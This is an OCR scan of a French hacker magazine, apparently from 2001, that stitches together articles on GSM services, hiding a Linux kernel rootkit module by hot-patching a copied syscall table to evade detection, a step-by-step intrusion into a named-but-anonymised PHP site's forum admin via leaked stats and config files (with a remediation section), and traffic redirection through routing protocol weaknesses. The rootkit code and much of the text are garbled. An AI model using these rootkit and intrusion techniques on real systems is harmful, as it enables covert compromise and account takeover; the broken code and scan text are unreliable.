à travers cette norme GSM encore en vigueur aujourd’hui, enfin 
voilà un petitschéma récapitulatifde l'architecture du réseau GSM. 
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Maintenant on va voir non plus comment marche le GSM mais 
qu’estcequeleGSMapporte, sesutilisations. .… Danslecas de téléphone 
portable, les GSM offre à ses abonnés 3 types de services qui sont : 

æ Les services supports. 


m Les téleservices. 


_æ Les services supplémentaires 


Les services supports : Le GSM offre à ses abonnés des services 

supports c’est-à-dire permettant à des utilisateurs le transfert de 

données d’un bout à l’autre du réseau. Ces services supports 

répondent à des attributs techniques que voilà : 

æ L'attribut de transfert d’information : Ces attributs définis- 

sent les possibilités de transfert d'informations d’un réseau 

depuis un point vers un ou plusieurs autres. Il existe 2 types d’at- 

tributs, les dominants et les secondaires. Les attributs dominants 

déterminent une catégorie de services alors que les attributs 

secondaires caractérisent unservice. Voilà les 4 attributs dominants : 

% Mode de transfert d’information (Circuit, paquet) : Il caracté- 
rise le réseau de transmission de données avec lequel l’utilisa- 
teur veut adhérer. | 

2. Débit de transfert d’information 

S. Type d’information (numérique, parole) 

4, Structure 
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Voilà les 3 attributs secondaires : 

1. Mode d'établissement delacommunication: [caractérise leréseau 
avec lequel on souhaite échanger des données. Pour cela il 
existe 2 types, avéc connexion et sans connexion, dans Le pre- 


mier cas on observe 3 étapes, l'établissement, l'envoi des données, 


la libération. Alors que dans le deuxième cas on n’observe que 
l’envoi de données, c'est a dire que les données sont envoyées 
sans savoir si le terminal permettant la réception est présent. 

2. Configuration de la communication (point à à point ou multi- 
point : Elle caractérise le type d'envoi de données, car cer- 
tains réseaux acceptent d'envoyer des informations d’unterminal 
vers plusieurs à la fois. 


3. Unidirectionnel, Bidirectionnel (symétrique, asymétrique) : 


Il caractérise la circulation des informations entre les termi- 
naux ainsi que le rôle de chacun dans cet échange. 
æ L'attribut d'accès: Cesattributsdéfinissentlesmoyens d’ accéder aux 
services supplémentaires d'un réseau en fonction de 2 variables : 
1% Canal et débit d'accès. 
2. Protocole d’accès. 
Ces 2 variables concernent l’ensemble des services supplémen- 
taires, qui sont : 
% Qualité de service. 
2. Opérationnel et commerciaux. 
S. Services supplémentaires assurés. 
4, Possibilités d’interfonctionnement. 
Il faut savoir que dans un réseau GSM les données de l’abonné et 
de la signalisation du réseau sont véhiculées dans des canaux dif- 
férents. Les services supports fournis par la norme GSM utilisent 
desapplicationsmultimédia très diverses (la transmission de la pho- 
nie, un accès a un réseau X.25, un transfert de données multimé- 
dia, une messagerie...) 
æ Les attributs généraux 


Les téléservices : Les téléservices sont des applications opé- 
rationnelles grâce au réseau et destiné a ses abonnés. Ils utilisent 
les possibilités fournies par les services supports. Ces téléservices 
permettent entre autres la communication entre 2 postes mobiles 
(2 GSM) ou entre 1 poste mobile et 1 fixe (1 GSM et 1! RNIS). Ils 
permettent aussi les appels d'urgence grâce à une touche de votre 
terminal, accessible a tout moment, l’envoi de messages courts (SMS 
qui sont limités à 160 caractères maximums). Voilà un récapitu- 
latif des téléservices offert par les opérateurs. Pour la voix on a 
accès aux appels d'urgence et à la téléphonie, pour les données on 
a accès à la messager 1 point à point, pour les SMS la transmis- 
sion est limitée à 160 caractères. 
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Les services supplémentaires : Lesservicessupplémentaires 
sont les petits plus offerts par nos chers opérateurs, ce sont en 
général des dérives des téléservices, voilà une petite liste : 


®% Identification de l'appelant 
2, Renvoi d'appel 

S. Indication d’appel:en absence 
4. Mise en garde d'appels 

8. Restriction d'appels 

6. Messagerie vocale 

7. Double numérotation 

8. Conférence 

9. Transfert d'appel en cours 
10. Numérotation abrégée 
11% Rappel si occupation 


Malgré toutes ces options et ces services que l’on peut avoir avec 
le GSM on peut quand même se poser des questions, car comme 
on l’a vu le GSM est assez ancien, avec nos chers Pc on a accès à 
demultiples'applicationset services multimédia, donconesten droit 
de se demander quand pourra-t-on vraiment jouer en réseau avec 
notre téléphone portable... C’est pas avec le WAP qui a fait un 
gros Flop en France en tout cas, car trop cher, trop lent, en gros 
les opérateurs se sont foutus de notre gueule. La technologie sui- 
vante s’appelle l’'UMTS qui permettra, grâce à des vitesses de 
transmission bien plus élevée que celles du GSM, denombreusesnou- 


- velles applications sur nos beaux téléphones portables comme 


l’envoi d'image et de son 


Voilà cetarticlesetermineicimaispeut être a bientôt pour des aven- 
tures moins techniques et plus orientées Phreaking, car ya vraiment 
de quoi bien s’amuser avec des téléphones portables ou non. 


+ 


S100p_PSykoman 


Merci a : Kenshin mon pote. Tout les crew encore en 
vies BHZ, DREA-M, BU, RTC, Tout nos gars Partis trop 
tôt, j’pense à toi t'inquiète. 
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Les LKM invisibles : Gecone Partie. 


intro 


Nous avons appris la fois dernière comment cacher un module de 
la table des modules du noyau, mais 1] restait encore un point qui 
rendait notre Ikm pas très discret : la table des syscalls. 


La teble des syscalls ? 


Syscall_ table est untableau créé lors du démarrage du kernel 
(dans linux/arch/1386/Kernel/Entry.S), qui contient les adresses 
dans la mémoire du noyau de tous les appels systèmes. Sur l'ar- 
chitecture 1A32, un appel système est appelé par une interrup- 
tion dite Jogicielle” numéro 80, qui lance le PHONAAUS 
d'appels système "system_ call". 

system_call lit la Syscall_table pour trouver quel appel système 
executer, s'il en existe un. 

En scannant la mémoire du kernel pour rechercher l'adresse de 
sys_call_table, on retombe sur trois fonctions ou symboles : 


C0108che system call 
CO109uAc tracesys 
c020da20 __ Ksymtah_sys_ call table 


Je vous passe les détails du programme, qui après tout n'est pas 
très compliqué à fabriquer. 

Parpetit calcul on voit quelecode desystem._callfaitmoins de 1 80 bytes. 
tracesys sert à tracer des appelssystèmes, et___ ksymtab_sys_call_table 
. @stlatabledelinkagedynamiquequisertàinsmod, etdansnotreexemple 
à linker sys cale table avec notre module en .6 

L'idée du hack" est que laplüpart des IDS qui cherchent des 


Ikm's chérchent dans la Histe des appels systèmes pour en trouver 


qui ne sont pas#reglos" avec le System.map. On va donc s'arran- 
ger pour que ces IDS cherchent au mauvais endroit. 

Pour ce faire, onva créer une vraie fausse table des syscalls 
nommé hacked _sys_call=tablel|: 


void * makesyscalltahle( 
void “hacked sys call table: 
hackeï_ sys call_table=kmalloc(256"sizeaf(long int), GFP_ KERNEL); 
memcpy(hacked_ sys call_table sys. call table,256*sizeof(long int); + 
return hacked_ sys call_ table; | 
} 


On y copie la table des syscalls originale. 

Etapesuivante : scanner la mémoire du kernel pour trouver les fonc- 
tions a patcher. En effet, on va s'arranger pour que system_ call 
et tracesys cherchent dans notre table modifiée, au lieu de recher- 


cher dans la table "officielle". des 3 occurrences de l'adresse de | 


sys_call_table, juste deux doivent êtremodifiées :ilne faut pas mon- 
_trer au monde entier qu'on a dévié sys_call_table, en faisant une 
chose aussi stupide que modifier le symbole associé. 


Bref : Patching a chaud de notre kernel... 


int change_references(void “hacked_sys_call_table){ 
Char “pr; 
int count=0; 
for (inbptr =n) SYSTEM _ GALL ((nptr) <{n) SYSTEM CALL+200); 


n++) 
H(* (int )pt)=—={(inbsys call_table){ 
if (4++-count=3) 
return À; 
(int) *((int*)ptr) ={int hacked_ sys_ call_table: 





A naine 
reg (hacke_sys. call_table); /* free the unused array */ 
return -1; /* Im installation musts ahort */ | 


return 0: /*i Kernel non-crasted */ 


On peut voir que ce code est vraiment *TRES* simple. Il vérifie si 
il existe des zones à modifier et s'arrange pour en modifier que 
deux maximum. 


Et ça marche ? 


Bien oui, ça marche … Votre système linux utilise maintenant 
une table des appels systèmes flambant neuve ! 
Que montre Kstat ? 


falcon:—# kstat -s] grep W 


falcon:—#f 


Super ! pas le moindre Warning. Pourtant, si on fait le même test 
que précédemment, on retombe sur les mêmes conclusions : le 
Ikm fonctionne parfaitement. 





Existe-t-il des risques pour mon sys- 
tème? 


Je ne pense pas. Le seul risque que vous encourez est que les Ikm 
que vousinsmoderezaprès (etquiinterceptent oucréent dessyscalls) 
ne fonctionnent tout simplement pas. Ils seront affichés par 
kstats, mais ne fonctionneront pas vu qu'ils ne sont pas dans la 
vraie (la seule?) L'unique table dessyscalls, hacked_sys_call_table; 
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Un exerole de faille PHP Test de vulnérabilité 


L'urt du site cible du test restera anonyme pour des questions de sécurité ! 


1) Attaque : 


à - Visite du site : 

Je vais tout simplement surfer sur le site. Je note : 
- Le site utilise le PHP3. 
- Il y a un livre d’or et un forum, tout deux en php3. 
- Le forum utilise une base de données MySQL. 


Jeregardeen gros lessources des pages, pas très intéressantes, logique 


, onne voit rien en php :( | 


h - La prise d'empreinte : | 

Jecommence par le petit classique Whois pour cela j'utilise The Ana- 
LySeR un programme que j’ai codé en VB6 et qui est téléchar- 
geable sur mon site: http://www.securent-2000.com/, j'obtiens 


Query : WHWLXXX.COM 

Registry + Wiois.jokercom 

Results : 

domain : XXX.COM 

StAULsS : production 

origin-c : x @irance.com#0 

OWNeP : NICOLAS xxx 

email : x @irance. com 
… adress : XX 

City : XXX 

state : FRANCE 

postal-code : XXX 

COUNTY : FRANCE 

almin-c : nic @amen.fr#0 

tech-c : nic @amen.fr#0 

hilling-c : joker @amen.fr#0 

Server : paris.amen.fr 

lISeTVEr : ns2.amen.fr 

registrar : JÜRE-1 

created : 2000-08-07 05:08:18 UTE core 

modified : 2001-10-31 21:19:38 UTE JORE:1 


MAR COX 


Y 





expires : 2002-08-07 05:06:18 UTC 
SOUPCE : joker. com 
d-updated: 2001-11-08 14:40:18 UTE 


Je remarque que le site est hébergé sur Amen. 

Je peux donc en conclure qu’il va être difficile d’entrer sur le site 
via une faille applicative, du type Buffer overflow ou autre. car 
le site est sur un serveur d’Amen, un gros hébergeur Français et 
que ses serveurs doivent posséder un minimum de sécurité et doi- 
vent être correctement patchés. Néanmoins ce n’est qu’une sup- 
position de ma part. 

Ceci se traduit par le peu de probabilité qu’il y ai présence de 
failles applicatives, mais possibilité de failles de scripts ! 


Maintenant je vais jeter un petit œil pour voir s’il y a des rou- 
teurs ou firewall avant la machine cible, je fais donc un Trace 
route en utilisant VisualRouteS.Ob : 


80.11.87.58 
80.11.88. 
193.253.6.48 
193.252.88.2 
193.251.126.178 
193.251.128.18 
198.32.247.67 
195.154.0.118 
195.154.0.65 
195.154.0.33 
195.154.0.296 
62.210.0.50 
195.154.10.121 
217.175.182.162 


Tous mes paquets passent sans problèmes :) 1l n’y a donc pas de 
firewall. 
Maintenant que l’on sait tout ça il va falloir des informations 


* sur la machine elle même. Tout d’abord l'OS utilisé : amen utili- 
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se bien UNIX. On va faire une identification des services qui 
tournent sur la bécane. On va donc grabber les banner sur les 
ports ouverts et essayer d'identifier les services présents. 

J'ai le choix entre plusieurs types de scans : TCP (efficaces mais 
bruyant), le XMAS, le demi ouvert, le FIN etc. 

Comme il s’agit d’un tést de vulnérabilité et non d’un hack je 
peux utiliser le scan TCP :) | 

Le mieux est d’utiliser NMAP qui est disponible sous Win2000. 
Ici comme je devais juste effectuer un scan TCP, j'ai utilisé encore 
un fois un programme codé par moi même en VB6 et disponible 
sur mon site (The AnaLySeR ou TCPscan). 


[21] ProFTPD T-22rc1 Server (ProFTPD) 


[23] 

[25] 220 paris6.amen.fr ESMTP.Sendmail 8.10.2/8.10.2; Fri, 9 Nov 2001 17:01:91 
+0100 | 
[80] 

[81] | 

[110] +-0K QPOP (version ?) at paris6.amen.fr starting. 
<17568.1005321693@naris6.amen.fr> 

[143] * OK paris6.amen.fr IMAP4rev1 v12.264 server ready 

[444] 


Tout ça est très intéressant ! on voit qu'il y a un serveur FTP un 
telnet, un smtp, un http, un pop êt un Imap. Le port 81 étant 
attribué pour l'administration à distance du site. Il s’agit en fait 
d’untableau de contrôle où seul l'administrateur du site y a 
accès. 

On voit aussi que l'administrateur du serveur de amen est 
consciencieux car il a enlevé la bannière du serveur POP on peut 
alors se demander si les bannières qu’on a reçu sont vraies ou 
truquées par l'administrateur système ?? 


Top 2 surun total de 2 utilisateurs 
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Bon j'ai déjà récolté pas mal d'informations. J'aimerai savoir si le 
serveur en face utilise Linux ? pour cela j’envoie un paquet TCP 
sur un port fermé, céla aura pour conséquence un renvoi d’un 
paquet particulier de la cible, En sniffant le rétour sur ma machine 
et Je regarde la valeur que prend le TOS du paquet retour. Je vois 
CO , il y a donc de grande chance que la machine utilise Linux. 


Je fais un petit scan de CGI pour la route même si je sais que cela 
ne servira à rien car des serveurs de cette taille ont très rarement 
ce genre de problèmes. Il consiste à vérifier des problèmes liées à 
des application CGI, où l'exploitation se fait via une URL pour 
la majorité. Il suffit donc de vérifier si l'URL existe. 


En effet j'obtiens aucun résultat. 


Bon je vais m'arrêter là pour la recherche d'informations sur le 
serveur d’Amencar1lest peu probable que je puisse passer par ce che- 
min, Je pourrai vérifier quelques informations en me connectant 
en telnet, en essayant de scanner pour trouver un wardialling 
etc... mais bon. 


c - Exploitation des résultats 
Je vois qüe le site cible est sous amen. Je vais donc accéder à ses stats. 


/Stats 
/stats/fn/ 
/stats/mail/ 


Ainsi j'obtiens les noms des utilisateurs : 
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0.15% ICSCWXC 


0.15% |script 


cp 


1 
1; 
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Dans la section FTP j'obtiens les URL de certains fichièrs qui sont censés être cachés : 


us bomsmerempmmrememenmansenenenlemememememementonmenempmetnenetenrnmnnetetenememet 





= 
Cu [24f ions! 83/14 
[2 [12] 508%| 28| 7250] 
[a [ail s66%| 10! 255% 
[4 [1o! 424%] 124| 31029 | 
[5 | 9! 3ax| 13! 33%) 
lé | 6! 2545! 15| 3740 


pe Ton 23 sur un total de 126 URLs 


a ge ue De 49 nt QT AGORA on A te A 


febitestiforum/post htm 
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fyebitest/forunvmessage .php3 


D qe A ee © 2 0 


fwebitest/fonam/ 
fweb/foram/posterphp3 | 





Suite de l'article Yahoo piratable by Foy 


Yahoo France a été contacté par téléphone le 28 novembre, une 
lettre recommandée détaillant le résultat complet demon audit leur 
a été envoyée quelques jours après, ainsi qu'à Yahoo USA. Ces 
trous de sécurité, importants, ont probablement été corrigés, 
mais au cas Où il en subsisterait d'autres voici quelques conseils: 
ne transmettez Jamais d'informations confidentielles non cryp- 
tées par internet, faites une sauvegarde de vos messages, ne cli- 
quez jamais sur un lien ou un bouton contenu dans un mail, désactivez 
le javascript et lechargement automatique des imagessur votre navi- 
gateur, et allez à la pêche au lieu d'utiliser un ordinateur. Si vous 
suivez tous ces conseils, vous ne craignez plus rien ! 


Merci à Uzy, Slider, et Kicker pour leur collaboration et leur 
travail sur les failles des webmails. 


FozZy 
Hackademy Member of Staff 
fozzy(@dmpfrance.com 





Dans un soucis éthique, et de sécurité pour 

les utilisateurs de Yahoo mail, nous n'avons pas publié 
ici le moyen concret, que nous connaissons, de pirater le 
service. Nous décrivons en revanche laes causes de ces 
failles dans le détail. | 


Www.dmpfrance.com 
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J'ai donc obtenue les URL de certain fichiers importants : <1 
//metire l'url du répertoire du forum sans le slash de fin 
Aorum/config.txt Ssite="http://Mww.xxx. com/lorum"; 
Aorum/suppression.phns //email de l'administrateur du forum 
es Semail_wm="wehmaster @xxx.com"; 
/est/iorum/ 
etc... //nom du site 
Snom_site="xxx"; 


Je vaisjeter unoeil danssur/test/et j'obtiensune page quime deman- 
de un login et mot de passe. Cela veut tout simplement dire qu'il //mot de passe pour acceder à l'administration 


s’agit du répertoire propre au webmaster et utilisateurs du sites. Spass="er 2x1"; 6 
Ilestpossible que le mot de passe ne protège qu'un fichieretnon 
le répertoire: //60pyright 
| Scopyr="<br><hr><center>&copy;&nhsp;1898 - 20001 xx</center>", 
Je vais donc relever dansles stats toutes les URL qui m'indiquent > 


fichiers et sous répertoires du répertoire TEST. 
| Encore un problème de sécurité à ce stade. J’obtiens donc le mot 


Et en effet j’y ai accès. Voici un premier problème de sécurité ! de passe de l'administration du forum. 
Je vais,essayer de lire le fichier config.txt dont jai obtenu l’url Je vais faire un tour sur leur forum pour comprendre un peu 
dans les stats. J’obtiens : comment il fonctionne, les noms de variables utilisées etc... 













; CRETE £ : RENE ET PER 1 

BE 

EX Li dd PAR ax : | Aie L 
(Nouveau Sujet  — a 
£ RER EE RS SEP nt ee VO Eten 9 09 : : d = T SN | 
rmserenees a * ES se < = ; 

: SUITE Sete | Fe Auf 


© Cotiment faire. 


AS Re ete ee vs 














LEE S DETET rte: Mess 
de ï Â: } | | 
bancs memes ant - eco peser CRC RER DE à IRC D DS CEE) 
ÉCompient | | | THE MaTriX nt 
SRE SUITE PB EDS DIRE D LE CT DER NENSOCETEE EE TE S L Re DRE MSN DE DEEE LT 5 LE ER 5 
4 | k L 3 — 2 + : : . 22 34 - AN à 
| supoR gabydounaïit ee 
. Z . sm 2 
| DESIONSUESE EEE PCET ICE RERE ES PERRET Re nel LAPS PC PE SNS MP PTE D ET CARE, PT TT NE NE RE MC ER ÉS RR 2 RS LR DS Sn 
| | | ‘ @ 

A GER LR TES PA M PS LS STE LR EDEN LE PE TE CEE D PO EE ECS TOP ER LS DCE PSE PRE EG ED EDR ONET AS CD VrrV3mm IL 24 255 Li E Lars L 7 . 4 
nt arret re éme. ; < : HE . £ | po n 
{RMI \ nt à Sos 108 = RER 

: FRS CRE 2 & : + 
HSE uf ts CA tar Us L: = eut l 
: RE EEE RE £ = le à no 25 = = Mise - » | ui = = < : tré 4 : n ë " # . ET e > 

L 













ON VA ALLER V Voir ) 


PLUS PRÈS, LE FLO 


R2 





DÉCEMBRE 2001 


[ci on voit la page d’accueil du forum : index.php3 


Je vois que chaque message contient un numéro, et la lecture 


fonctionne comme ceci : message.php3?nume=21 
Il y a donc une variable "nume”. 


Maintenant Je vais essayer de trouver la variable d’administra- 
tion, où le mot de passe doit être entré. 
Je tape logiquement : /forum/index.php3?admin= er2x! 


Là je retombe sur la page d’avant. Aucune 404, c’est donc que je 
suis sûrement logé en tant qu'administrateur . 


Je clique sur un message pour vérifier. 
En bas du message il y a marqué "supprimer". je suis donc bien 
logé en tant qu’administrateur sur le forum et je peux le modifier. 


Pour la page suppression.php3 

Elle utilise la variable "num_supp". donc 
/forum/suppression.php3?nume_sup=21 

supprimera le message nume=2 1. 


De plus la page suppression.php3 présente un bug decodageimpor- 
tant. En effet lorsque que l’on va sur la page, il y a un lien 
retour au forum! en cliquant sur ce lien on retourne au forum 
en effet mais en tant qu'administrateur. Le programmeur pensait 
queseul l’adminconnaîtrait l'existence de la page suppression.php3 
donc il a fait ceci. Grave erreur car j'ai pu obtenir le nom de la 
page via les stats et à cause de ce bug je peux obtenir directement 
la variable et le mot de passe administrateur du forum. 


Voici la ligne de code qui pose problème dans le fichier suppres- 
sion.php3 : 


<tenter><ahrel=\"index php ?admin=Spass \">Relour auforum</a></center>"; 
2) Résumé : 


Résumé des problèmes PHP : 

1) Les stats fournissent trop d'informations 

2) Lesystèmedemotdepasseutilisépour lerépertoire/testn’estpasfiable 

3) Le mot de passe d'administration est trop facilement accessible 

4) Lenomdela variable d'administration du fichier forum/index.php3 
est trop logique et permet une utilisation directe du mot de 
passe obtenue. 

5) Erreur de programmation dans la page suppression.php3 


SX) LA Si 
RSS) NEST, ALARMAME 
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Coté positif : 

1) Pas de page d'administration accessible directement. Du type 
Horum/admin.php3 

Les réactions de l'administrateur du site : ÿ 

Ben en faite je penser pas que je pouvais me faire avoir juste par 

une visualisation de mes stats ce qui est quand même très 1diot de 

la part de l'hebergeur. Je te remercie." 


Ici le webmaster pense que c’est la faute de l’hébergeur mais c'est 


de sa faute car c’est à lui de sécuriser son site surtout que Amen 


: propose dans ses forums la solution à ce problème ! l'hébergeur 


est donc absolument pas mis en cause mais c’est plutôt le web- 
master qui l’est. 


3) Phase de sécurisation : 


Tout d’abord il faut sécuriser l’accès aux stats. 
Pour cela nous allons créer un premier fichier htaccess.txt : 


AuthType Basic 

AuthName “Protection des stats" 
AuthUserFile /home/sites/www.xxx.com/weh/.htpasswi 
<Files slats> 

require valid-user 

</HIe$> 

<Files mail> 

require valid-user 

</HIes> 

<Hles fip> 

require valid-user 

</Hles> 

<Files stats olt> 

require valid-user 

</Fles> 


Puis nous allons créer un second fichier htpasswd.txt 
Root: 570W2Yige9lQc 


Ici le mot de passe crypté est "amine". De nombreux scripts exis- 
tent pour procéder à ce cryptage. 
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Maintenant quelesfichierssont crées, 1] va falloir les mettre à la raci- 
ne du site /web 

Une fois ceci fait, nous les renommons en .htaccess et .htpasswd 
céci pouvant être fait que du coté serveur et non du coté client 
car seul UNIX accepte cela. 

Voilà l'accès aux stats-est sécurisé. 


Maintenant passons a la sécurisation des fichiers .txt qui contien- 
nent le mot de passe d'administration. Pour que le code ne soit 
plus lisible, 11 suffit de modifier l'extension du fichier en .php3 
au lieu de .txt 


Voilà ceci étant fait 1l faut mettre à jour le script du forum pour 
lui indiquer les changements. 


Ensuite, il faut modifier le nom de la variable $admin en un nom 
moins évocateur, par exemple $txda. 

Pour une meilleure utilisation du mot de passe protégeant le 
répertoire réservé aux membres du sites /test 11 suffit d'utiliser un 
script approprié. 

Etenfin dernière chose, modifier le code de la pagesuppression.php3 : 


A l'origine : <center><a href=\"index.php3?atmin==$pass\">Retour au 
forum</a></center>"; | 


+ 
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Il faut enlever ?admin=$pass ce qui donne : <center><a 
href=\"index.php3\"> Retour au forum</a></center>"; ainsi 
même si quelqu'un trouve l'existence de ce fichier, il ne pourra 
pas obtenir la variable et le mot de passe juste en cliquant sur un 


lien ! 


Auteur : Johan 

De l'équipe SecureNT-2000 
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Savoir prendre le contrôle de son routeur 


Cette série d'articles est destinée à vous ouvrir à la voie du futur : 
l'attaque des routeurs. J'ai lu récemment un papier du CERT qui 
indiquaitque l'attention des hackers se reportait de plus en plus 
sur leséquipementsde routage au détriment desserveurs (qui, paraît- 
il, seraient demieux enmieux sécurisés :0).Ilest vraiqu'ilyadequoi 
s'amuser (ou se faire du soucis selon la situation !) avec ces équi- 
pements qui sont forcés d'être plus ou moins ouverts sur Inter- 
net. Je vais vous expliquer les principes du routage sur Internet, 
les différentes familles de protocoles et d'algorithmes de routage 
et on terminera cet article par une rapide étude des failles du 
protocole de routage dynamique RIP. Les autres protocoles de 
. routage seront abordés (dans le sens "A L'ABORDAGE!!!" :) 
dans un prochain papier (pas facile d'expliquer dans le même 
article RIP OSPE BGP et tout le toutim général !). 


- Quel est l'intérêt de s'intéresser aux routeurs ? 


Attention, notre but dans cet article est avanttout de vous faire 
découvrir lesfonctionnementsderoutage quisontutiliséssur Inter- 
net ou dans les entreprises. La présentation des failles, qui n'est qu'une 
partie annexe, est la cerisésur le gâteau dontl'objectif est de 
vous inciter à approfondir les concepts abordés ici. 

Ainsi dans le but recherché par l'exploitation des failles des pro- 
tocoles de routage n'est pas deprendre directement la main sur 
les routeurs. Nous allons jouer directement sur leurs faiblesses 
pour modifier les routes et rediriger le trafic vers notre machine, 
vers une machine qué nous contrôlons (c'est mieux !) ou vers une 
IP non utilisée (pour réaliser des Dénis de Service). J'exclu du 
sujet tout ce qui touche aux faillessur les routeurspermettant d'exé- 
Cuter des commandes. 

Une fois que le trafic aura été redirigé vers notre machine, nous 
aurons àlerouter pour l'acheminer vers la destination (ou tout bête- 
ment le bloquer si on souhaite empêcher deux réseaux de commu- 
niquer). Du momentique le trafie passe par notre machine, 1l est 
possible de (au choix) : 


- lire toutes les données transmises entre deux réseaux 
(sniffer) 

- modifier toutes les données transmises entre deux réseaux 
(hijacking par ex) 

- bloquer des données de manière sélective (Déni de Service) 


Pour ceci, vous pourrez utiliser les outils classiques de routages 
largement distribués dans les distributions linux, ou vous pour- 
rezégalement utiliser le logiciel VirtualIP Phalanx Router (VIPPR) 
créépar le groupe Phenoelit (www.phenoelit.de). Ce logiciel est des- 
tiné spécifiquement à un usage de hacker (ou assimilé) : ce n'est 
pas un produit standard de routage comme routed et consorts. 
La différence tient à denombreux détails, expliquéssur leursite web, 
qui font que la personnalisation de son fonctionnement est êle- 
vée. Allez jeter un coup d'oeilausite, ces types là font des trucsimpres- 
sionnants ! :) 


Avant-de passer à la partie "ludique", il est impératif d'essayer de 
comprendre les bases suivantes, quitte à n'en comprendre qu'une 
partie. Je ne saurais que trop vous conseiller de vous reporter 
également aux cours réseau disponibles sur Internet etaux RFCpour 
compléter ce que je dis : je ne peux pas être exhaustif, et apprendre 
à chercher (et à trouver !) est quelque chose d'extrêmement for- 
mateur :). 


Bon courage ! :P 
1 - Pourquoi routage "dynamique" ? 


Il faut faire la distinction entre : 

- le routage statique : l'admin réseau fixe les routes "en dur” 
sur chaque routeur et le chemin emprunté pour aller de A vers B 
sera toujours le même. Si une liaison physique (un câble) par 
lequel passent lescommunicationsallant de À vers Best coupée (coup 
de pelleteuse approximatif par exemple), À ne pourra pas com- 
muniquer avec B jusqu'à ce que l'admin modifie les routes sta- 
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tiques sur les routeurs pour faire passer les communications par 
un autre chemin. 


- le routage dynamique: tout se faitautomatiquement (ou presque). 
L'admin n'a qu'à configurer quelques paramètres initiaux sur ses 
routeurs et c'est ensuite les protocoles dé routage dynamique qui 
gèrent les ajout/suppression de nouvelles routes. Le coup de la 


pelleteuse qui arrache le câble serait résolu automatiquement par 


lesystème dans un tempsrapidecomparéà l'intervention d'un admin 
sur du routage statique. Des versions évoluées de protocoles de 
routage dynamique permettent également de gérer desnotions comme 
la charge d'un réseau (plutôt que de passer tout le temps par un même 
réseau surchargé, autant passer par un réseau peu utilisé qui per- 
mettra également d'atteindre la destination) ou le coût d'un lien 


(certains fournisseurs d'accès facturent à la quantité d'info trans- 


mise => autant choisir la liaison disponible la moins coûteuse). 


Le routage dynamique prend touteson ampleur dans des réseaux dits. 


maillés qui fournissent plusieurs chemins pour aller de A vers B. 


<Remarque> 


Depuis tout à l'heure je parle de A et de B. 
Nous allons considérer que A et B sont des 
machines, mais il faut savoir que le routage tra- 
vaille avec des notions de réseau : le rou- 
teur raisonne ainsi: "pour atteindre le 
réseau d'adressage N, je dois passer par 
telle interface vers telle passerelle et ça va 
me coûter tant". Vous pouvez considérer qu'une 
interface est l'équivalent d'une carte réseau. 
Un routeur possède plusieurs interfaces en 
principe connectées chacune à un réseau 
différent. 


Les réseaux maillés, comme Internet par exemple, permettent d'avoir 
une redondance de routes importante et rendent ainsi l'achemi- 
nement plus fiable, voir plus efficace. Ainsi, si la pelleteuse de 
Jayce (décidément, yen a un paquet de pelleteuses dans cet 
article.) coupe un câble transportant des données Internet d'un 
Fournisseur d'Accès Internet (FAT) au Maroc, les Marocains neseront 
paspour autant privés d'Internet carilexistera d'autrescheminspar 


Ha] 
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lesquels les donnéespourront transiter (saufbienSûr si Jaycearrache 
votre câble téléphonique juste sous votre fenêtre.…;). 


Nousallons voir les protocoles deroutage dynamique quisefondent 
sur des processus automatiquesse basant sur des dialoguesentrerou- 
teurs sur le réseau. Le routage statique n'est exploitable que si 
nous avons la possibilité d'exécuter des commandes sur le routeur 
et nous avons exclu ce cas du champs d'étude. 


2 - Les différents types de routage dynamique 


L'exemple type du réseau maïllé dont le fonctionnement s'appuiesur 
des protocoles de routage dynamique est Internet. Vous imaginez 
bien (je l'espère en tout cas ;) qu'il est impossible de connaître 
toutes les routes possibles de À vers B à un instant donné (et ce 
surtout si À et B sont séparés par de nombreux routeurs) : elles 
sont trop nombreuses et le maintien d'une telle base de données à 
jour serait impossible ! | 


C'est pour cela qu'Internet, et les réseaux maillés en général, sont 
découpés en Autonomous System (AS) qui sont chacun gérés par 
un FAI ou un opérateur Internet. Quand un problème est trop 
complexe, on le découpe en sous-entités logiques plus simples à 
résoudre. De la même façon, l'ensemble deséquipements quiforment 
Internet est trop complexe à considérer dans sa globalité, donc 
on le découpe en sous-entités chacune gérée par un acteur bien 
défini. | 


Ce découpage va même plus loin : chaque AS est subdivisé en 
plusieurs sous-AS qui sont gérés par les entreprises clientes par 
exemple…..et ainsi de suite (une grosse entreprise peut également 
elle-même définir ses propres sous-sous-AS =). 


Chaque AS est identifié par un numéro unique sur 16 bits et ils 
sont composés d'une multitude derouteursquicommuniquententre 
eux. Au sein d'un AS donné, la communication se fait grâce à un 
Interior Gateway Protocol (IGP) qui peut être l'un des proto- 
coles suivants : OSPE RIP IGRP EIGRP 


L'IGP (c'est en fait un terme générique décrivant une famille de pro- 
tocoles de routage) assure donc le fonctionnement du routage dyna- 
mique au sein de l'AS uniquement. 
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Les mises à jour dü routage dynamique entre différents AS sont 
réalisées par une famille de protocoles de routage appelée Exte- 
rior Gateway Protocol (EGP). C'est souvent le protocole Border 
Gateway Protocol (BGP) qui est employé en tant qu'EGP 

Un ou plusieurs routeurs d'un AS sont désignés pour assurer 
l'interconnexion et le routage dynamique vers les autres AS et 1ls 
font donc tourner un protocole de type EGP Ce routeur, dit "de 


M 


frontière", s'adressera donc à ses homologues des AS voisins (les rou- 


teurs de frontières des autres AS) et assurera l'interconnexion et. 


le routage dynamique à destination de ces derniers. 
3 - C'est bon-vous tenez le coup ? 
Allez, on souffle 2 secondes’et on continue ! ;) 


4 - Routage dynamique‘nterne : tout (ou 
presque) sur les IGP 


Nous allons maintenant aborder les différents algorithmes utili- 


sés par les protocoles de routage. Il existe deux types et demi de 
fonctionnement : 


a) Distance Vector - Algorithme de 
Bellman-Ford | 


bes protocoles de vecteurs de distance nécessitent la connaissance 
des routeurs voisins proches. Eneffet, les communications ne 
sont faites que vers ces voisinsimmédiats directement connectés (c'est 
à dire ne nécessitant pas le passage par un ou des routeur(s) 
intermédiaire(s)). | 
Chaque routeur possèdeune table des vecteurs de distance qui 
ressemble à ceci : 


du réseau local(A) passer [ar 
vers la destination la liaison (si tisponible) 


A1 interface ethernet n°1 - 
interface ethernet n°2 - 
interface ethernet n°1 








@IP passerell 





Pour chaque entrée, le réseau de destination est identifié, le nom 
de l'interface est spécifié (pour savoir sur quelle interface envoyer 
les paquets vers cette destination donnée), tout comme l'@IP de 
la passerelle (si le routeur à l'autre bout du lien en possède une) 
et le coût nécessaire pour atteindre cette destination (voir plus 
loin pour la formule de calcul). 


Il ne peut pas y avoir deux routes différentes inscrites dans la 
table pour unemême destination : seul la route la moins chèreconnue 
